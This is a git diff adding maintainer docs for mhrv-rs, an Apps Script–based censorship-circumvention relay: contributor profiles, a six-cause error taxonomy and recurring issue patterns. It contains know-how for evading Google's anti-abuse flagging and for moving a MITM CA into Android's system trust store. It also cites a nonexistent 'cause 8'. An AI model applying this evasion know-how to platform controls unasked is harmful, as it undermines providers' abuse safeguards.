+- Suggested the v1.8.x "per-deployment auto-throttle" feature (AIMD style) with detailed rationale.
+- Suggested the v1.9.0 xmux roadmap items: byte-range slipstreaming across deployments, MTU/packet-size optimization, per-deployment burst limits.
+- Drove the v1.8.x DNS architecture redesign by pointing out that Iranian DNS providers (Shecan, 403) perform DNS hijacking and poisoning — they cannot be trusted as privacy-preserving alternatives (see #449).
+
+**How to engage**:
+- Reports are detailed and self-correct fast as data comes in
+- Setups tend to be advanced (multiple deployments, Hetzner VPS, Full mode)
+- Tag as a core reviewer for v1.9.0 xmux design issue when filed
+- Communication: English
+
+### @2bemoji
+
+**Domain**: roadmap design discussions, particularly for QUIC blocking and DNS optimization.
+
+**Notable contributions**:
+- Drove the design of `block_quic` 3-state UI toggle (off / drop / reject with ICMP unreachable for instant Happy Eyeballs failover) in #361 / #377
+- Surfaced the mobile-accessibility framing for `block_quic` (config-only is "Linux desktop only" for users who can't easily edit Android's `/data/data/...` config)
+
+**How to engage**:
+- Tag for Android UI batch decisions, especially anything touching QUIC / DNS / network-layer toggles
+- Tag for v1.9.0 xmux design as a core reviewer
+- Communication: English
+
+### @ipvsami / Sam Ashouri
+
+**Domain**: advanced Full mode setups, dual-VPS topologies, account suspension reports.
+
+**Notable contributions**:
+- Reported the Iranian-VPS xray entry topology in #420 (Iranian VPS as xray entry, German VPS as tunnel-node exit) — drove the dual-routing-xray design discussion
+- Reported the Google account flag pattern in #421 (phone-less new accounts, "action required" notifications, Workspace landing HTML on flagged deployments) — drove the v1.8.x detection for the 6th cause in the diagnostic taxonomy
+
+**How to engage**:
+- Comfortable with VPS / xray / network routing; explanations can assume that level
+- Tag for v1.9.0 xmux design as a core reviewer
+- Communication: English
+
+### @dazzling-no-more
+
+**Domain**: code contributor — substantive Rust PRs.
+
+**Notable contributions**:
+- PR #121 (`--remove-cert` flag for clean CA teardown)
+- PR #359 (Google Drive queue tunnel mode — community-testing, awaiting cleanup confirmation)
+- PR #438 (H1 container keepalive + 431 oversized headers + clearer port-collision message — merged in v1.8.3)
+- PR #439 (DoH bypass for Cloudflare/Google/Quad9/etc. on TCP/443 — merged in v1.8.3)
+- PR #446 (tunnel-node long-poll raised to 15s, adaptive straggler settle — merged in v1.8.4)
+
+**How to engage**:
+- PRs tend to be self-contained with tests and clean diffs
+- Address review feedback substantively — they iterate based on reviewer comments
+- Tag for v1.9.0 xmux design as a core reviewer (could potentially contribute the implementation)
+- Communication: English
+
+### @euvel
+
+**Domain**: code contributor — Apps Script (Code.gs) features.
+
+**Notable contributions**:
+- Designed the spreadsheet-backed response cache (#400 design discussion → PR #443 implementation)
+- All 5 review suggestions from the design discussion implemented in PR #443: TTL-aware caching, 35 KB body-size gate, header rewriting on hit, circular buffer for O(1) writes, Vary-aware compound cache keys
+
+**How to engage**:
+- Apps Script JavaScript expertise; consider tagging for any future Code.gs changes
+- Communication: English
+
+## Adjacent projects
+
+### @masterking32
+
+Original Python project (`masterking32/MasterHttpRelayVPN`). mhrv-rs is the Rust port; the project periodically cherry-picks stability/feature commits from masterking32. PR #438 in v1.8.3 was a batch of three such cherry-picks. Not a direct contributor here, but the project's design parent.
+
+### @denuitt1
+
+Maintainer of `denuitt1/mhr-cfw` — Cloudflare Workers backend that aims to be Apps Script-compatible. Independent project, not officially endorsed. Tracked in #380 / #393 for compatibility audit. Not a direct contributor here.
+
+### @g3ntrix, @mehrad-mz
+
+Authors of forks/branches on the Python project that occasionally have valuable commits to cherry-pick (see #430 for the audit list).
+
+## Tagging conventions
+
+When tagging in a comment:
+
+- Reviewer requests: "@dazzling-no-more — would you mind reviewing this approach?"
+- Cross-references: "see [#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404) where @w0l4i described this"
+- Recognition: "this drove the design — thanks @euvel for the detailed initial proposal"
+- For v1.9.0 xmux design issue specifically (when it's filed): tag @w0l4i, @2bemoji, @ipvsami, @dazzling-no-more, @euvel as core reviewers
+
+Don't ping people gratuitously; each ping should have a clear ask or recognition.
+
+## Project history context
+
+The project predates this repo as `masterking32/MasterHttpRelayVPN` (Python). The Rust port was started for performance + cross-platform binary distribution. Apps Script protocol stayed compatible across both, and we periodically cherry-pick from upstream Python. v1.7.x represented the initial port stabilization; v1.8.x is the "DPI evasion + diagnostics + community-contribution batch"; v1.9.0 will be the xmux flagship.
+
+Canonical "long" issues for context:
+- #313 — Iran ISP throttle, primary tracking issue
+- #300 — SABR cliff, primary tracking for video streaming limit
+- #310 — VPS setup help, primary tracking for setup questions
+- #333 — VPS / Full mode / Iranian-network workarounds
+- #420 — dual-VPS topology, primary tracking for advanced Full mode
+- #382 — Cloudflare error patterns
+- #325 — community-shared deployment workflow
+- #361 / #377 — Android UI batch + QUIC blocking design
+- #369 — v1.9.0 xmux design (RFC, not yet filed as the formal design issue)
+- #449 — DNS architecture redesign (post-Shecan correction)
diff --git a/docs/maintainer/references/diagnostic-taxonomy.md b/docs/maintainer/references/diagnostic-taxonomy.md
new file mode 100644
index 00000000..35b8b6f8
--- /dev/null
+++ b/docs/maintainer/references/diagnostic-taxonomy.md
@@ -0,0 +1,161 @@
+# Diagnostic taxonomy: the placeholder body
+
+## What this is
+
+Multiple distinct conditions cause Apps Script (or our own scripts on Apps Script) to return an HTML body that mhrv-rs's batch parser sees as `bad response: no json in batch response: <body prefix>`. Through user reports and iteration we've narrowed the body strings to **6 candidate causes**. Distinguishing them requires both client-side detection (string-match on body content) and server-side disambiguation (`DIAGNOSTIC_MODE` flag in Code.gs).
+
+This taxonomy is the post-mortem evolution of v1.8.0 → v1.8.1 → v1.8.2 → v1.8.3 detection. v1.8.1 falsely asserted "AUTH_KEY mismatch" on body match; v1.8.2 softened to enumerate 4 candidates; v1.8.3 added the Persian-localized cause and the Workspace landing HTML cause for account-flagged deployments — bringing the count to 6.
+
+## The 6 candidate causes
+
+### 1. AUTH_KEY mismatch (intentional decoy)
+
+**Body**:
+```html
+<!DOCTYPE html>
+<html>
+<head><title>Web App</title></head>
+<body><p>The script completed but did not return anything.</p></body>
+</html>
+```
+
+**Source**: Our `Code.gs` / `CodeFull.gs` returns this when `request.k !== AUTH_KEY` and `DIAGNOSTIC_MODE = false`. It mimics Apps Script's stock placeholder for empty-return scripts.
+
+**Trigger**: User edited AUTH_KEY in Apps Script editor but didn't redeploy as new version, OR user has different AUTH_KEY in `config.json` than in `Code.gs`, OR user is using Code.gs deployment ID with `mode: full` (which expects CodeFull.gs).
+
+**Disambiguator**: Set `DIAGNOSTIC_MODE = true` in Code.gs / CodeFull.gs + redeploy as new version. Then this case returns `{"e":"unauthorized"}` (explicit JSON) instead of the HTML. The other 5 cases are independent of DIAGNOSTIC_MODE and still return their natural body.
+
+**Fix**: Align AUTH_KEY values + redeploy as new version.
+
+### 2. Apps Script execution timeout
+
+**Body**: same `"The script completed but did not return anything"` HTML, but emitted by Apps Script itself (not our script) when the execution exceeded the per-invocation cap.
+
+**Source**: Apps Script's runtime kills the script after 6-min hard cap or 30s soft cap on Web App responses, then serves the placeholder body.
+
+**Trigger**: Slow upstream destination, large response payload, network stall mid-fetch.
+
+**Disambiguator**: With `DIAGNOSTIC_MODE = true`, AUTH_KEY mismatch (cause 1) goes away; if the placeholder body still appears for some batches, it's likely cause 2/3/4/5/6.
+
+**Fix**: Lower `parallel_concurrency` in `config.json`, retry, accept some intermittent failures.
+
+### 3. Apps Script soft-quota tear
+
+**Body**: same placeholder HTML. Sometimes a different short HTML page mentioning Apps Script's quota system.
+
+**Source**: Apps Script's per-100s rolling soft quota or per-account daily quota hit. Apps Script kills the request mid-execution.
+
+**Trigger**: Account-aggregate UrlFetchApp throughput exceeded per-100s threshold (~30 concurrent or so). Common with multi-device single-deployment users during page load events (browsers fire 50+ requests in a burst).
+
+**Disambiguator**: Same as 2 — DIAGNOSTIC_MODE rules out AUTH_KEY but doesn't distinguish 2 from 3 from 4. Check the per-script_id error rate over a few minutes — if a deployment has 30%+ failure rate during peak browser activity but works fine when idle, it's quota-related (3 or possibly 5).
+
+**Fix**: Lower `parallel_concurrency`, add more deployments to `script_ids` rotation, distribute deployments across multiple Google accounts.
+
+### 4. Iran ISP-side response truncation
+
+**Body**: typically truncated mid-stream — the body that arrives at mhrv-rs is missing the trailing JSON envelope. The early bytes look like a valid Apps Script response prefix but the request was cut by an ISP-side TCP RST mid-flight.
+
+**Source**: Iran's ISP infrastructure (especially TCI/مخابرات) actively RST-injects on TLS connections to specific Google IPs (the #313 pattern).
+
+**Trigger**: Network-conditional. Active throttle periods (sometimes hours, sometimes days). Worse on certain Google IPs. Worse on certain Iranian ISPs.
+
+**Disambiguator**: Direct curl test from the user's network (see `issue-patterns.md` Pattern 3). If curl-to-Apps-Script also gets timeouts/RST, confirmed ISP-side. The HTML body in this case is partial/truncated — sometimes just `<!DOCT...` rather than the full placeholder.
+
+**Fix**: Workarounds in Pattern 3 — `disable_padding`, rotate `google_ip`, switch network, multi-deployment, Full mode + VPS.
+
+### 5. Apps Script Persian-localized soft-quota body
+
+**Body**:
+```html
+<html lang="fa" dir="rtl">
+<head>
+  <meta name="description" content="پردازش کلمه وب، ارائه‌ها و صفحات گسترده">
+  ...
+```
+
+May also include phrases like `از سهمیه پهنای باند مجاز فراتر رفته‌اید` ("you exceeded the allowed bandwidth quota") and `مقدار انتقال داده را کمتر کنید` ("reduce data transfer volume").
+
+**Source**: Apps Script itself. Apps Script localizes its system error pages based on the deploying Google account's locale (fa-IR for Persian) and/or the request-origin IP.
+
+**Trigger**: Account is Persian-locale (common for Iranian users) AND hit a quota threshold (cause 3) OR an internal Google-side hiccup.
+
+**Disambiguator**: With `DIAGNOSTIC_MODE = true`, cause 1 returns explicit JSON; if Persian HTML still appears, it's not our script — it's Apps Script's own response.
+
+**Important**: w0l4i's case in #404 traced through several wrong hypotheses before landing here:
+- Initially diagnosed as AUTH_KEY mismatch → no, mixed success/failure on same `script_id`
+- Then diagnosed as third-party relay (`g.workstream.ir` looks Iranian) → no, w0l4i clarified it's his own tunnel
+- Then diagnosed as Iranian VPS provider appliance → no, Hetzner Nuremberg
+- Final landing: Apps Script's own Persian-localized quota response based on Google account locale
+
+This iteration is documented because the false starts are instructive — don't lock in on the first hypothesis.
+
+**Fix**: Same as cause 3 (it's a quota issue presenting as Persian HTML).
+
+### 6. Workspace landing HTML for account-flagged deployments
+
+**Body**:
+```html
+<html lang="fa" dir="rtl">
+<head>
+  <meta name="description" content="پردازش کلمه وب، ارائه‌ها و صفحات گسترده"...
+  <title>...</title>
+```
+
+The body is Google Workspace's landing page (the description "Word web processing, presentations, and spreadsheets" is the standard tagline for Google Docs/Sheets/Slides). It's served by Apps Script when the deployment owner's Google account is in a flagged state (post-warning, pre-suspension).
+
+**Source**: Apps Script refuses to execute the deployed script when the owning account is restricted, and serves the Workspace landing page as a "log in" prompt instead.
+
+**Trigger**: Account is in stage 1b or stage 2 of the suspension progression (see `issue-patterns.md` Pattern 8). Often correlates with phone-less new accounts that ignored the "action required" prompt.
+
+**Disambiguator**: Owner of the deployment can log in to Google → see if there are pending warnings or restrictions. If yes → fix the account (add phone) or rotate the deployment to a healthier account.
+
+**Fix**: Account-side, not config-side. Add phone verification, OR move to a different deployment owner via #325 workflow.
+
+## v1.8.3 detection logic
+
+```rust
+// In src/tunnel_client.rs around line 893+
+if err_msg.contains("The script completed but did not return anything") {
+    tracing::error!(
+        "batch failed (script {}): got the v1.8.0 decoy/placeholder body — \
+         could be (1) AUTH_KEY mismatch (run a direct curl probe against \
+         the deployment to verify), (2) Apps Script execution timeout or \
+         per-100s quota tear (try lowering parallel_concurrency), \
+         (3) Apps Script internal hiccup (transient, retry next batch), \
+         or (4) ISP-side response truncation (#313 pattern, try a \
+         different google_ip). To distinguish (1) from the rest: set \
+         DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy as new \
+         version — only AUTH_KEY mismatch returns this body in diagnostic \
+         mode.",
+        sid_short
+    );
+}
+```
+
+This is the v1.8.2 string. v1.8.3 adds detection for the Persian quota body and the Workspace landing HTML as separate paths.
+
+## When responding to users showing this log
+
+The right response shape is:
+
+1. **Acknowledge** the log line they pasted
+2. **Enumerate** the 6 (or 4-5 in older versions) candidate causes briefly
+3. **Identify the most likely** for their specific case using context clues:
+   - Single-deployment user, fresh setup → likely cause 1 (AUTH_KEY)
+   - Mixed success/failure on same script_id → NOT cause 1 (AUTH_KEY would fail 100%)
+   - "Worked yesterday, broken today" → likely cause 4 (ISP throttle) or cause 8 (account flag in progression)
+   - High concurrency / many devices on one deployment → likely cause 3 (quota) or cause 5 (Persian quota variant)
+   - Persian HTML body → cause 5 or 6
+   - Hetzner/Iranian VPS Full-mode user → check if VPS is actually Iranian (provider appliance is real for Iranian VPS only)
+4. **Give the disambiguator**: DIAGNOSTIC_MODE flip + redeploy
+5. **Give the immediate workaround** appropriate to the most-likely cause
+
+Don't claim certainty before disambiguator data. v1.8.1 over-asserted; v1.8.3 explicitly enumerates because we learned to.
+
+## What v1.8.x roadmap is doing about this
+
+- **Per-script_id error-category counter** — surface in CLI/UI: "deployment AKfycbz1: 95% success, 4% timeout, 1% quota, 0% auth_mismatch over last 5 min". Lets users diagnose without flipping DIAGNOSTIC_MODE.
+- **Distinct error categories in client logs** — separate AUTH_KEY mismatch / timeout / quota / ISP truncation / Persian quota / Workspace landing into 6 distinct error log lines. Currently merged.
+- **AIMD per-deployment auto-throttle** — automatically lower `parallel_concurrency` for deployments that hit quota too often. Find the sustainable rate per deployment without manual tuning.
+
+These are queued for v1.8.x batch (~2-4 weeks).
diff --git a/docs/maintainer/references/issue-patterns.md b/docs/maintainer/references/issue-patterns.md
new file mode 100644
index 00000000..87dd77b5
--- /dev/null
+++ b/docs/maintainer/references/issue-patterns.md
@@ -0,0 +1,327 @@
+# Issue patterns
+
+The repo gets the same ~15 issues over and over with different wrappers. Recognizing the pattern fast is most of the maintenance job. Each section below covers: the symptoms users describe, what's actually happening, how to diagnose, and the canonical reply structure.
+
+## Pattern 1: AUTH_KEY mismatch (the v1.8.0 decoy body)
+
+**Symptoms**:
+- `502 Relay error: bad response: no json in: <!DOCTYPE html>...The script completed but did not return anything`
+- v1.8.1+ logs say `got the v1.8.0 bad-auth decoy` (now soft-language in v1.8.3)
+- Issue title often "502 error", "خطای 502", "ارور relay", or "no json in batch response"
+- Often combined with: "MITM mode works but Full mode doesn't" (CodeFull.gs has different AUTH_KEY than Code.gs)
+
+**Root cause**: The `AUTH_KEY` constant in `Code.gs` (or `CodeFull.gs`) on Apps Script doesn't match the `auth_key` field in mhrv-rs `config.json`. Apps Script returns the v1.8.0 decoy HTML.
+
+**The hidden killer**: Apps Script does NOT auto-pickup edits to deployed scripts. Editing `const AUTH_KEY = "..."` in the Apps Script editor and clicking Save does nothing for the deployed version. The user must:
+
+1. Apps Script web editor → **Deploy → Manage Deployments**
+2. Click the deployment → pencil/Edit
+3. Version dropdown → **New version**
+4. Click Deploy
+
+This redeploys with the new AUTH_KEY. Most users skip this and stay on the old version.
+
+**Diagnostic procedure**:
+
+Tell the user to flip `DIAGNOSTIC_MODE = true` at the top of `Code.gs` / `CodeFull.gs`, redeploy as new version, and re-test:
+
+- If they still see the same decoy body → it's NOT AUTH_KEY mismatch (one of the other 5 candidate causes — see `diagnostic-taxonomy.md`)
+- If they see explicit JSON `{"e":"unauthorized"}` → confirmed AUTH_KEY mismatch; align values + redeploy as new version
+
+**Canonical reply structure** (from #414 thread):
+
+1. Confirm the symptom matches the v1.8.x decoy detection
+2. Walk through the 6 candidate causes and explain why AUTH_KEY mismatch is most likely for their case
+3. Detail the redeploy-as-new-version steps with exact UI clicks
+4. Suggest the DIAGNOSTIC_MODE flip as the disambiguator
+5. Close with link to `diagnostic-taxonomy.md`-equivalent context
+
+## Pattern 2: TUNNEL_AUTH_KEY env var name confusion (Full mode)
+
+**Symptoms**:
+- User on Full mode, Docker container set up
+- `docker logs mhrv-tunnel` shows `tunnel_auth_key not set, using defaults`
+- Or: AUTH_KEY mismatch errors in mhrv-rs that the user "definitely" set correctly
+- Often Persian-language issue (matches Iranian VPS user demographic)
+
+**Root cause**: User typed `MHRV_AUTH_KEY` (wrong, this is what some old docs said), `Tunnel` (wrong, partial match), `tunnel_auth_key` (wrong, lowercase), `TUNNEL-AUTH-KEY` (wrong, dash instead of underscore), or skipped the env var entirely.
+
+The literal env var name is **`TUNNEL_AUTH_KEY`** — uppercase, three underscored words.
+
+**Diagnostic command**:
+```bash
+docker exec mhrv-tunnel env | grep TUNNEL_AUTH_KEY
+```
+
+Should print: `TUNNEL_AUTH_KEY=<their-secret>`. If empty, the env var wasn't set during `docker run`.
+
+**Canonical fix**:
+```bash
+docker stop mhrv-tunnel
+docker rm mhrv-tunnel
+
+docker run -d --name mhrv-tunnel \
+  --restart unless-stopped \
+  -p 8443:8443 \
+  -e TUNNEL_AUTH_KEY="<their-real-secret>" \
+  ghcr.io/therealaleph/mhrv-tunnel-node:latest
+```
+
+Then in `CodeFull.gs`, `const TUNNEL_AUTH_KEY = "<their-real-secret>"` must match. Redeploy as new version.
+
+**Related: port mismatch**. If `docker run` used `-p 8443:8080` or similar mapping, the curl test must use the external port. Check with `docker port mhrv-tunnel`.
+
+## Pattern 3: Iran ISP throttle (#313)
+
+**Symptoms**:
+- 504 timeouts, intermittent connection drops
+- "Worked yesterday, broken today"
+- "Mobile data works but home Wi-Fi doesn't" (or vice versa)
+- TLS handshake timeouts during SNI rotation pool tests
+- All sites slow, not specific to one destination
+
+**Root cause**: Iran's ISP infrastructure (especially TCI/مخابرات, less so MCI/همراه) actively RST-injects mid-stream into TLS connections destined for specific Google IPs. This is targeted at Apps Script outbound, not generic Google access. The throttle has plus-and-minus periods — sometimes off for hours, sometimes on for days. Was particularly aggressive starting late April 2026.
+
+**Direct curl test** (the gold-standard diagnostic):
+```bash
+curl -L -X POST 'https://script.google.com/macros/s/<deployment_id>/exec' \
+  -H 'Content-Type: application/json' \
+  -d '{"k":"<auth_key>","u":"https://httpbin.org/get","m":"GET"}' \
+  --max-time 30 -w "\ntime: %{time_total}s\n"
+```
+
+Run 5-10 times. If majority timeout/RST → ISP throttle confirmed. If majority succeed → it's mhrv-rs path or config.
+
+**Workarounds** (in roughly the order to try):
+1. Upgrade to latest version (each release tends to add diagnostics + small mitigations)
+2. `disable_padding: true` in config (~25% bandwidth savings, helps under throttle)
+3. Rotate `google_ip` to a different IP from the SNI pool (some IPs filtered, others not, varies by ISP and week)
+4. Switch network (mobile data often less throttled than home Wi-Fi)
+5. Multiple `script_ids` in config — rotation helps when individual deployments are mid-throttle
+6. Full mode + non-Iranian VPS (Hetzner/Contabo/OVH or Iranian-VPS-broker like Parspack selling German VPS)
+
+**Don't promise a fix**. The ISP throttle is upstream of anything we can ship. Acknowledge it, list workarounds, point at #313 as the canonical thread.
+
+## Pattern 4: Apps Script self-loop restriction (Google services blocked)
+
+**Symptoms**:
+- "cloud.google.com gives 403"
+- "Can't access Gmail / Meet / Drive / Colab / Gemini"
+- "google.com loads but mail.google.com doesn't"
+- "YouTube video player shows error" (different — this is SABR cliff #300)
+
+**Root cause**: Google explicitly blocks `UrlFetchApp.fetch()` calls to `*.google.com`, `*.googleapis.com`, `*.gstatic.com`, `*.googleusercontent.com`. This is hardcoded into Google's API to prevent Apps Script from being abused as an internal Google proxy. **No HTTP-relay-on-Apps-Script architecture can fix this.**
+
+**No workaround in apps_script mode**. This is permanent.
+
+**Workaround for users with VPS in Full mode**: dual-routing in xray. Their xray client (or v2ray, etc.) routes Google domains direct from their VPS, everything else through mhrv-rs. See #420 for the canonical thread with config snippets.
+
+**Canonical reply**: explain the architectural limit, list the affected sites, point at #420 for the dual-VPS workaround. Close as duplicate of #420 if it's a clean duplicate.
+
+## Pattern 5: SABR cliff (#300) — YouTube video doesn't play
+
+**Symptoms**:
+- "YouTube loads but video doesn't play"
+- "This content isn't available"
+- "Playback error" / "An error occurred"
+- "Short videos work, long ones don't"
+
+**Root cause**: Apps Script's 30-second response cap. YouTube's SABR streaming protocol expects long-lived response streams. After ~30s the stream gets cut by Apps Script and the video player errors out. Page HTML/JS loads fine (small, fits in window). Video stream doesn't.
+
+**Workarounds**:
+- Short videos (<1 min) often work
+- Lowest quality (144p/240p) sometimes squeaks past
+- YouTube web in Chrome/Firefox (browsers use user trust store on Android, YouTube app doesn't) > YouTube app
+- NewPipe (Android, F-Droid) sometimes works better than official app
+- Full mode + VPS (definitive — bytes flow through TCP tunnel, not Apps Script's response window)
+
+v1.9.0 xmux roadmap aims to mitigate by splitting streams across multiple deployments. Won't fully resolve.
+
+**Canonical reply**: explain SABR cliff, list workarounds, close as duplicate of #300 if pure duplicate.
+
+## Pattern 6: Android user trust store
+
+**Symptoms**:
+- "Browser works but YouTube/Telegram/Instagram apps don't"
+- "VPN is on but apps don't go through mhrv-rs"
+- "How do I make Gmail app work?"
+
+**Root cause**: Android has two CA trust stores — system (factory-installed CAs) and user (user-installed CAs via Settings → Security → Install certificate). Since Android 7.0 (2016), most apps default to system-only. The mhrv-rs MITM CA installs to user trust store; system trust requires root.
+
+**Apps that work via mhrv-rs on Android**: Chrome, Firefox, Edge, Brave (browsers explicitly opt in to user trust). Most desktop-class apps that delegate to system browser.
+
+**Apps that don't work**: YouTube app, Gmail app, Maps, Instagram, Twitter/X, banking apps, any app shipped with strict TLS pinning. They use system trust + don't see mhrv-rs.
+
+**Workarounds**:
+- Use web versions (`youtube.com` in Chrome instead of YouTube app)
+- Root + Magisk + MagiskTrustUserCerts module migrates user CA to system
+- Full mode + VPS (bytes don't flow through MITM, so trust isn't needed for arbitrary apps; v2ray/xray on VPS handles routing)
+
+**Canonical reply**: explain user/system trust store distinction, list which apps work, give the three workarounds. This is FAQ-tier — should eventually be in `docs/faq/android.md`.
+
+## Pattern 7: Cloudflare CAPTCHA / 403
+
+**Symptoms**:
+- "Most CF-protected sites block me"
+- "ChatGPT shows captcha I can't solve"
+- "Cloudflare checking your browser..." stuck
+
+**Root cause**: All mhrv-rs traffic exits via Google data center IPs (Apps Script's outbound). Cloudflare's bot detection flags traffic from Google IPs to consumer-facing sites as suspicious — looks like a scraper/bot, not a person. Result: aggressive CAPTCHA, sometimes outright 403.
+
+**Workarounds** (limited):
+- Solve interactive CAPTCHA when shown — the resulting token works for hours
+- Different browser fingerprints sometimes pass (Brave, Tor)
+- Full mode + VPS — VPS exits with its own (residential-adjacent) IP, often not flagged
+- Cloudflare WARP integration is on the v1.9.x roadmap (#309) but feasibility uncertain
+
+**Canonical reply**: explain why (Google IP exit), list workarounds, point at #382 (canonical Cloudflare thread) and #309 (WARP roadmap).
+
+## Pattern 8: Apps Script account suspension / phone-required
+
+**Symptoms**:
+- "Action required" notifications on Google account
+- "Phone number must be added"
+- Deployment intermittently returns Persian Workspace landing HTML (`<html lang="fa" dir="rtl">پردازش کلمه وب...`)
+- Sometimes resolves on its own; sometimes escalates to suspension
+
+**Root cause**: Google's anti-abuse system flags new Google accounts (especially phone-less ones) within hours of deploying automation-pattern code. The progression is: warning → soft restriction (Workspace landing HTML on UrlFetchApp calls) → full suspension.
+
+**Workarounds**:
+1. Add a phone number to the account (most reliable). Iranian phones often filtered by Google's verification; user might need a friend's foreign number, TextNow, paid SMS-receive service, or shared phone
+2. Use established phone-verified accounts (own main Gmail, family/friends' main accounts) — multi-year-old accounts with normal usage history are very rarely flagged
+3. Workflow #325 — community shared deployments (one user with stable account hosts the deployment, others use the deployment ID + shared AUTH_KEY)
+
+**Risk levels** (approximate, from observed reports):
+- Phone-verified personal Gmail, single deployment, light use → low risk
+- Phone-verified, multiple deployments under same account → medium risk
+- New no-phone account, any usage → high risk
+- Old established account, single deployment → very low risk
+
+No confirmed cases of full Google account ban (Gmail deletion, Drive loss). Suspensions are scoped to Apps Script + UrlFetchApp.
+
+## Pattern 9: Telegram / VoIP / "app doesn't work in Full mode"
+
+**Symptoms**:
+- "Can I add Telegram support?"
+- "WhatsApp/Skype voice calls don't work"
+- "Need a port for Telegram"
+
+**Root cause**: Telegram uses MTProto (custom UDP-ish protocol). WhatsApp/Skype/FaceTime voice/video use WebRTC (UDP STUN/TURN). Apps Script's `UrlFetchApp` is HTTP/HTTPS only — **cannot carry UDP or non-HTTP protocols by design.**
+
+**Workarounds**:
+- **Telegram messaging**: web.telegram.org through mhrv-rs Chrome (HTTPS, works)
+- **Telegram MTProto proxy**: use a public MTProto proxy from Telegram channels (free, unreliable) or self-host on VPS
+- **Voice/video calls**: only via Full mode + VPS + xray UDP-enabled routing — bytes route direct from VPS to upstream, not through Apps Script
+
+Architectural ceiling — can't be fixed in mhrv-rs core.
+
+## Pattern 10: Config file confusion (config.json vs scan_config.json)
+
+**Symptoms**:
+- "I followed instructions but it doesn't import the config"
+- User pastes a config that has `google_ips`, `max_ips_to_scan`, `scan_batch_size`, `google_ip_validation` fields
+- Says "the program doesn't pick up my config"
+
+**Root cause**: User confused `config.json` (main runtime config — `script_ids`, `auth_key`, `google_ip`, `mode`, etc.) with `scan_config.json` (input for `mhrv-rs scan-ips` diagnostic command — Google IP discovery).
+
+**Fix**: explain the two files, point at `config.example.json` in repo root for the right template.
+
+Common related typos:
+- `script_id` (singular) instead of `script_ids` (plural array) — mhrv-rs parses as 0 deployments and falls back
+- `mode: "fullmode"` or `"full_mode"` instead of `"full"` (or `"apps_script"`)
+
+## Pattern 11: Windows OpenGL renderer fail
+
+**Symptoms**:
+- `Error: Glutin(Error { ... NotSupported("extension to create ES context with wgl is not present") })`
+- `Error: Wgpu(NoSuitableAdapterFound)`
+- run.bat fails twice (Glow then wgpu fallback) and exits
+
+**Root cause**: User's Windows lacks OpenGL 2.0+ AND lacks DX12/Vulkan-compatible GPU. Causes: old GPU (Intel HD 2500/3000-era), running in VM without GPU acceleration, RDP session, missing/corrupt graphics drivers.
+
+**Workaround**: use the CLI binary `mhrv-rs.exe` directly. Put `config.json` in the same folder, double-click `mhrv-rs.exe`, set browser proxy to `127.0.0.1:8086`. Same functionality, no UI.
+
+v1.8.x roadmap: improve `run.bat` to auto-fallback to CLI when both UI renderers fail.
+
+## Pattern 12: VPS / Full mode setup questions
+
+**Symptoms**:
+- "How do I set up VPS?"
+- "Does the VPS need to be reachable from Iran?"
+- "Which provider should I buy?"
+- "Step-by-step please"
+
+**Canonical answer**: VPS does NOT need to be reachable from Iran (Apps Script proxies the path). Recommended providers:
+
+- **Direct purchase from Iran**: difficult — Hetzner needs VAT ID
+- **Iranian reseller**: Parspack ([parspack.com/vps](https://parspack.com/vps)), Iranserver, Hostiran sell German VPS via Iranian payment with mark-up (~20-40% over direct)
+- **Outside Iran**: Hetzner Falkenstein DE, Contabo DE, OVH SYS — direct euro/dollar payment
+
+Specs: 1 vCPU, 1 GB RAM, 25 GB SSD, 50+ Mbps unmetered → ~$3-5/month direct or ~250-500k toman/month via reseller for personal use. For 5+ devices + Instagram smooth: 2-4 GB RAM, 100 Mbps unmetered.
+
+Setup walkthrough: see `tunnel-node/README.md` and `tunnel-node/README.fa.md` (Persian).
+
+## Pattern 13: Iranian VPS provider bandwidth-cap appliance
+
+**Symptoms** (rare but observed):
+- Persian "exceeded bandwidth quota" HTML response from user's own tunnel-node URL
+- Mixed success/failure on same `script_id`
+
+**Root cause** (provisional — confirmed only when VPS is on Iranian provider): Iranian VPS providers enforce monthly bandwidth quotas at the upstream router/load-balancer layer. When tripped, they intercept traffic and serve a Persian quota landing page **upstream** of the user's Docker container. Container itself never sees the request during quota events.
+
+**Note**: Several users have reported this where the VPS turned out to be at Hetzner DE (not Iranian) — in which case the Persian body is actually Apps Script's own localized soft-quota response (cause #5 in the diagnostic taxonomy). Always confirm the VPS provider before assuming.
+
+**Workarounds**:
+1. Upgrade plan if provider has a higher tier
+2. Move to non-Iranian VPS (Hetzner/Contabo/OVH unmetered)
+3. Client-side bandwidth optimizations: `disable_padding`, lower `parallel_concurrency`, DNS bypass (v1.8.3+)
+
+## Pattern 14: Account locale → Persian Apps Script error pages
+
+**Symptoms**:
+- Apps Script's response body comes back as Persian HTML (Workspace landing page or quota page)
+- User on Hetzner/non-Iranian VPS
+- Their Google account is set to fa-IR locale OR request originates from Iranian IP through some leg
+
+**Root cause**: Apps Script localizes its system error/placeholder pages based on the deploying account's locale and (sometimes) request-origin IP. Persian-locale account → Persian error pages. This is independent of the user's geographic location running mhrv-rs.
+
+**Disambiguator**: `DIAGNOSTIC_MODE = true` in Code.gs. If still see Persian body → it's NOT AUTH_KEY mismatch (which gets replaced with explicit JSON in diagnostic mode). It's Apps Script's own quota/state response.
+
+This is the "5th candidate cause" in the diagnostic taxonomy and the "6th candidate cause" if you separate "Workspace landing HTML for account-flagged deployments" from "Persian quota body for healthy deployments under quota tear".
+
+## Pattern 15: Download large files / IDM workaround
+
+**Symptoms**:
+- "Downloads stick at 1-10 MB"
+- "Need to download a 1 GB file, IDM gets partial only"
+
+**Root cause**: 30s response cliff again. For 10 MB files at typical Apps Script throughput, 30s is enough. For 1 GB, would need 200+ seconds — hopeless.
+
+**Workarounds**:
+- IDM's multi-segment download with 5 MB segments — each segment fits inside 30s window
+- Full mode + VPS — bytes flow through TCP tunnel, not constrained
+- v1.8.x roadmap: range-aware splicing in Code.gs to natively support `Range:` requests
+
+## Quick triage table
+
+When a new issue lands, scan for these keywords to map fast:
+
+| Keywords | Pattern |
+|----------|---------|
+| `502`, `decoy`, `no json in batch`, `script completed but did not return` | 1 (AUTH_KEY mismatch) |
+| `tunnel_auth_key not set`, `MHRV_AUTH_KEY`, `Tunnel_Auth_Key`, `docker logs mhrv-tunnel` | 2 (TUNNEL_AUTH_KEY confusion) |
+| `504`, `timeout`, `Apps Script unresponsive`, `Connection reset`, `RST`, "yesterday worked" | 3 (Iran ISP throttle #313) |
